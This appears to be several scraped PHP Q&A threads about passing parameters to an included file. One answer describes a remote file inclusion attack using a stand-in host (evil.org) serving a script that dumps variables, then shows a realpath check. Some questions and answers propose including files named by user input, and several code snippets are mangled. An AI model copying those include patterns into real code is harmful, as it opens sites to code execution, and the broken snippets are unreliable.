How to make filename include variable depending on $_GET php
Now I would like to include a file, the name will be passed in the url, so for example I wouldc do www.site.com/file.php?name_of_file_to_include=body to load body.php in the file:
Welcome to my home page!
Some text.
Is this possible or Is it a better option to do this thing. The purpose to do so is because I will change only a part of the file, but there are lots of files I want to load
Yes, it’s possible and depending on how many files you are loading there may be a better way to do that. Are you doing this for any particular reason? Usually it’s the other way around. You will have page.php that includes the header
Note: if you do go this route, make sure the php.ini setting allow_url_include is disabled. Otherwise, an attacker could specify a file on a remote server to be executed on yours.
@GigaWatt I was just about to ask how to avoid that in a production setting. Thanks. This seemed like a far too easy way to execute malicious code.
5 Answers 5
It is possible of course. I would make sure, that $_GET[«name_of_file_to_include»] **does not contain a remote url. Otherewise your script is higly vulnerable against remote script injection.
Imagine the attacke prepares an url like :
index.php?name_of_the_file_to_include=http://evil.org/my On his server he has stored a file named my.php :
foreach(get_defined_vars() as $var)
This script would run directly in the context of your application and would the let see your db config and so on.
So make sure that you prepend at least a path before the include to prevent form remote script injection. Like this:
However this isn’t safe enough as the attacker will still being able to execute code that is already on your system. Maybe a php file which is otherwise restricted. So you should make sure that the path is insight your content folder:
// realpath will remove all '/..' from path: $path = realpath('./sites/' . $_GET['file_to_include'] . '.php'); // if the file does not exists realpath returns false if(!$path) < die('error'); >// check if the path starts exactly with your site path if(strpos($path, realpath('./sites')) !== 0) < die('error'); >// we are safe now: include $path; PHP, include with parameters
I have a PHP-file which will be called from a form. So it gets parameters over $_GET. Now I need the exact same functionality of this file, but not in such a form-call. I will include it in normal code with fixed parameters (which normally come from the form). So my file can work with the form AND without it. I know only the way with include and setting the $_GET in front of it. But I am not sure this is the most elegant way (I dont like the idea of setting things like $_GET). any other ways of doing this? br, chris
5 Answers 5
You can convert the code to a function that takes an associative array as its parameter.
That way, you can just include it when necessary and call the function with either $_GET or an array you build yourself.
this is kind of what i was going to suggest. create a function that takes arguments. when you are processing a form, use GET vars as the function call’s arguments, otherwise, set the arguments to whatever you want.
You could first do an if statement to see if the $_GET parameters are already set. If they are already set, assign them to variables that the script can use, and if they are not already set, just assign your fixed parameters to the variables.
since you should be doing some kind of parameter sanitizing in your file you could parse parameters like this
$someConfigVar = isset($config['someConfigVar']) ? $config['someConfigVar'] : sanitize($_GET['someConfigVar']; in this case you just need to fill the $config array before including your file. this code snippet expects sanitize() to be your sanitizing function (defense against xss and SQL injects etc)
If I understand you correctly, you could create an array full of default values. When this script is called it will check to see if $_GET is empty. If $_GET is empty, the default values are used, else, the default array is overwritten with $_GET and those values are used.
$def = array( 'keyA' => 'valueA', 'keyB' => 'valueB' ); if ( !empty( $_GET ) ) $def = $_GET; // $def contains either your defaults, or the user-provided values It’s important to note that this logic can be broken up into two files.
/* index.php */ $def = array( 'keyA' => 'valueA', 'keyB' => 'valueB' ); if ( !empty( $_GET ) ) $def = $_GET; include( 'doStuff.php' ); /* doStuff.php */ if ( !isset( $def ) ) $def = $_GET; echo $def['keyA']; Note that in doStuff.php we check to see if $def is set. If this script is being included into index.php , then we know $def is set and those default values are present. If doStuff.php is being called directly, then we know that $def is most likely not set, and that we need to set it based upon $_GET . Either way, when the script is ready, we will have a variable called $def where we will get all of our values.
How to pass parameters with `include`?
I have a PHP script called customers.php that is passed a parameter via the URL, e.g.: http://www.mysite,com/customers.php?employeeId=1 Inside my customers.php script, I pick up the parameter thus:
$employeeId = $_GET['employeeId']; That works just fine. I also have an HTML file with a form that inputs the parameter, and runs another php script, viz:
$employeeId = $_POST['employeeId']; So far so good. But his is where I am stuck. I want to run my customers.php script, and pass it the parameter that I pave picked up in the form. I am sure this is really simple, but just cannot get it to work. I have tried:
include "customers.php?employeeId=$employeeId&password=password"; Well You want to give the customers.php the parameters from the form. The form will send you everything via a post, so everything is available by $_POST, however, you have got that so far and you know what is happening. So the next thing is, that you want to open the customers.php file and give the parameters from the form, what would be the employeeId. What do you want to do there in your customers.php? If you just want to call a function in that file, you could just include(customers.php) and then call the function and give the id as a paremeter to the function?
6 Answers 6
You can’t add a query string (Something like ?x=yyy&vv=www) onto an include like that. Fortunately your includes have access to all the variables before them, so if $_GET[’employeeId’] is defined before you call:
Then customers.php will also have access to $_GET[’employeeId’];
«You can’t add a query string . » — Actually you can, but it’s not recommended: php.net/manual/en/function.include.php#example-128 Anyway, +1 for useful answer
What I did not realise is that I can just set elements of $_GET[]. I has assumed that it would be read-only.
PHP includes are really includes; they attach piece of code from that location to this location.
PaulPRO’s answer most likely tells what you want to achieve, but also other variables would be usable in the included file. So if you define $foo = «bar»; in index.php and include layout.php after that line, you could call this $foo variable in that layout.php file.
If you seriously want to pass an URL to the file, you can insert the URL into variable and in included file parse it with parse_url
EDIT: and yes, I do not suggest adding query params to actual include url as it starts to mess up with GET array and eventually you’ll just be confused what there should be and start smacking your head into wall.
PHP — include a php file and also send query parameters
I have to show a page from my php script based on certain conditions. I have an if condition and am doing an «include» if the condition is satisfied.
Now the problem is the server has a file «myFile.php» but I want to make a call to this file with an argument (id) and the value of «id» will change with each call. Can someone please tell me how to achieve this? Thanks.
What does myFile.php actually do in your case? Unless you request the include over HTTP, you can’t add parameters to the filename, but you could influence its behaviour via a global variable of some sort.
13 Answers 13
Imagine the include as what it is: A copy & paste of the contents of the included PHP file which will then be interpreted. There is no scope change at all, so you can still access $someVar in the included file directly (even though you might consider a class based structure where you pass $someVar as a parameter or refer to a few global variables).
Also note: $_GET will be the same for all included files. So if that is where your query parameters are stored, it will still see them. Also note: it is not the function, in a class.
You could do something like this to achieve the effect you are after:
$_GET['id']=$somevar; include('myFile.php'); However, it sounds like you are using this include like some kind of function call (you mention calling it repeatedly with different arguments).
In this case, why not turn it into a regular function, included once and called multiple times?
An include is just like a code insertion. You get in your included code the exact same variables you have in your base code. So you can do this in your main file :
The simplest way to do this is like this
You can share variables since you are including 2 files by using «include»
If you are going to write this include manually in the PHP file — the answer of Daff is perfect.
Anyway, if you need to do what was the initial question, here is a small simple function to achieve that:
> // now it's time to include the real php file // all necessary variables are already defined and will be in the same scope of included file include($phpinclude); > I’m using this variable variable construction very often.
I know this has been a while, however, Iam wondering whether the best way to handle this would be to utilize the be session variable(s)
In your myFile.php you’d have
Would this circumvent the «suggested» need to Functionize the whole process?
You want to make it a function so you don’t initiate a bunch of requests. The problem isn’t how to get the information to the included PHP — OP’s method already achieves that.
In the file you include, wrap the html in a function.
In the file where you want it to be included, include the file and then call the function with the parameters you want.
Please add some explanation to your answer such that others can learn from it. How does wrapping markup in a function relate to the given problem?
I have ran into this when doing ajax forms where I include multiple field sets. Taking for example an employment application. I start out with one professional reference set and I have a button that says «Add More». This does an ajax call with a $count parameter to include the input set again (name, contact, phone.. etc) This works fine on first page call as I do something like:
User presses a button that makes an ajax call ajax(‘references.php?count=1’); Then inside the references.php file I have something like:
I also have other dynamic includes like this throughout the site that pass parameters. The problem happens when the user presses submit and there is a form error. So now to not duplicate code to include those extra field sets that where dynamically included, i created a function that will setup the include with the appropriate GET params.
The function checks for query params, and automatically adds them to the $_GET variable. This has worked pretty good for my use cases.
Here is an example on the form page when called:
Just another example of including GET params dynamically to accommodate certain use cases. Hope this helps. Please note this code isn’t in its complete state but this should be enough to get anyone started pretty good for their use case.